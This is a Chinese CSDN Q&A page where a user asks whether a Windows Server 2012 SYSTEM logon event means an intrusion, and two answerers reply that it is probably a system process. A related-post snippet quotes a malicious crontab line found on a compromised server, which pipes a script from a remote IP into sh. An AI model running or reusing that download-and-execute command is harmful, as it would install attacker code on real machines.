2 tianya0 tianya0 于 2017.01.08 09:30 提问

我的Windows Server 2012服务器是不是被入侵了?——在线等

Windows Server 2012 DataCenter
日志如下:

已成功登录帐户。

使用者:
安全 ID: SYSTEM
帐户名: LIU2012$
帐户域: WORKGROUP
登录 ID: 0x3E7

登录类型: 5

模拟级别: 模拟

新登录:
安全 ID: SYSTEM
帐户名: SYSTEM
帐户域: NT AUTHORITY
登录 ID: 0x3E7
登录 GUID: {00000000-0000-0000-0000-000000000000}

进程信息:
进程 ID: 0x1dc
进程名: C:\Windows\System32\services.exe

网络信息:
工作站名:

源网络地址: -
源端口: -

详细身份验证信息:
登录进程: Advapi

身份验证数据包: Negotiate
传递的服务: -
数据包名(仅限 NTLM): -
密钥长度: 0

创建登录会话后,在被访问的计算机上生成此事件。

“使用者”字段指明本地系统上请求登录的帐户。这通常是一个服务(例如 Server 服务)或本地进程(例如 Winlogon.exe 或 Services.exe)。

“登录类型”字段指明发生的登录种类。最常见的类型是 2 (交互式)和 3 (网络)。

“新登录”字段指明新登录是为哪个帐户创建的,即登录的帐户。

“网络”字段指明远程登录请求来自哪里。“工作站名”并非总是可用,而且在某些情况下可能会留为空白。

模拟级别字段指明登录会话中的进程可以模拟的程度。

“身份验证信息”字段提供关于此特定登录请求的详细信息。
-“登录 GUID”是可用于将此事件与 KDC 事件关联起来的唯一标识符。
-“传递的服务”指明哪些中间服务参与了此登录请求。
- “数据包名”指明在 NTLM 协议之间使用了哪些子协议。
-“密钥长度”指明生成的会话密钥的长度。如果没有请求会话密钥,则此字段为 0。


为新登录分配了特殊权限。

使用者:
安全 ID: SYSTEM
帐户名: SYSTEM
帐户域: NT AUTHORITY
登录 ID: 0x3E7

特权: SeAssignPrimaryTokenPrivilege
SeTcbPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeDebugPrivilege
SeAuditPrivilege
SeSystemEnvironmentPrivilege
SeImpersonatePrivilege

2个回答

caozhy
caozhy   Ds   Rxr 2017.01.08 10:44

如果这个登录不是你所为,或者你授权的某个程序/脚本所为,那么可能就是被入侵了。

lyhoo163
lyhoo163   Rxr 2017.01.09 07:22

这是系统进程登录,可能是你的一个程序的登录。

Csdn user default icon
上传中...
上传图片
插入图片
准确详细的回答,更有利于被提问者采纳,从而获得C币。复制、灌水、广告等回答会被删除,是时候展现真正的技术了!
其他相关推荐
入侵Windows服务器的流程
一般情况下,黑客往往喜欢通过文章的上所示的流程图对Windows服务器进行攻击,从而提高入侵服务器的效率。 ·通过端口139进入共享磁盘。139端口是为“NetBIOS Session Service”提供的,主要用于提供Windows文件和打印机共享。开启139端口虽然可以提供共享服务,但常常被攻击者所利用进行攻击,如使用流光、SuperScan等端口扫描工具可以扫描目标计算机的139端口,如
发现小服务器被入侵了 cpu长期100%
前两天用路由开了个外网端口,把自己的一台centos6.5台式机挂上了外网。还挺有成就感的。 定时任务里有个每晚23点30自动关机的操作。昨天发现没有自动关机,没在意就手动关了。 今天本想查看一下定时任务,排查下问题。结果发现的入侵: crontab  -l */5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh */5
[Windows_Server_2012优化V1.1_20140425]
[Windows_Server_2012优化V1.1_20140425] Winsows Server 2012 Datacenter Evaluation Build 9200数据中心评估版GUI
Windows Server 2012 在桌面上显示”我的电脑
如果是在Windows Server 2012本地控制台下,直接按Win(键盘上的微软徽标键)+R,输入: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,0 回车后,勾选所需要的桌面图标的名称,确定即可。
快速自检电脑是否被黑客入侵过(Windows版)
https://www.pppan.net/blog/detail/2017-11-08-windows-self-check 1. 异常的日志记录 通常我们需要检查一些可疑的事件记录, 比如: “Event log service was stopped.”(事件记录服务已经停止) “Windows File Protection is not active on this
入侵服务器的一种方法
实现通过远程命令行来实现对服务器入侵的一种方法
Windows Server 2012 在桌面上显示”我的电脑”
运行->cmd,在cmd窗口输入以下命令,即可选择 rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,0
服务器被入侵当做挖矿肉鸡
服务器被入侵当做挖矿肉鸡 CPU使用率高 挖矿肉鸡 服务器被入侵 yam占用CPU
windows server 2012 删除IIS,解除80端口占用
打开“服务器管理器”,在右上角依次找到菜单:“管理(M)”→“删除角色和功能”, 选择IIS服务器管理器,下一步删除即可。
关于Windows Server R2服务器自动关机解决方法
现象问题:安装的2008R2系统的服务器,经常自动就关机了,不知原因? 分析原因:正常的系统只要不是硬件问题,是不会出现自动关机的,如果自动关机可能是某些进程引起,可以进行排查。 解决方法: 1.先在系统进程中看看是否存在wlms.exe,如果有这个进程,那么这个进程就会导致系统的自动关闭。 2..先下载一个PSTools工具,解压于C盘下。 3..这时候打开命令窗口,先CM